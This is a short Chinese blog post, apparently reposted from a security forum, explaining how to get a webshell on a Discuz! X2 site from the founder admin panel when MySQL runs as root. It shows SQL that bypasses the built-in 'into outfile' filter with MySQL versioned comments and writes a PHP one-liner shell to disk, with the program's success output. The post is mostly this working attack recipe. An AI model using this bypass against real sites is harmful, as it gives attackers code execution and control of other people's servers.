作者:yesu
最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell
百度无果,自己本地架设了一下
1,当mysql是root时
站长---数据库---升级
尝试
select '1' into outfile 'E:2.txt'
会提示
[Type] 查询语句安全威胁
[Query] select '1' into outfile 'E:2.txt'
为什么会这样呢?
configconfig_global.php中
限制了into outfile函数
尝试绕过
/*!select*/ '1' /*!into outfile*/ 'E:3.txt'
Discuz! 数据结构升级成功,影响的记录行数 1
如果要导出一句话,即
/*!select*/ '' /*!into outfile*/ 'E:3.php'
注意:一句话密码不要有引号
摘自:https://www.t00ls.net/viewthread.php?tid=21208
留言评论(旧系统):
文章来源于lcx.cc:Discuz X2 后台getshell 鸡肋
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论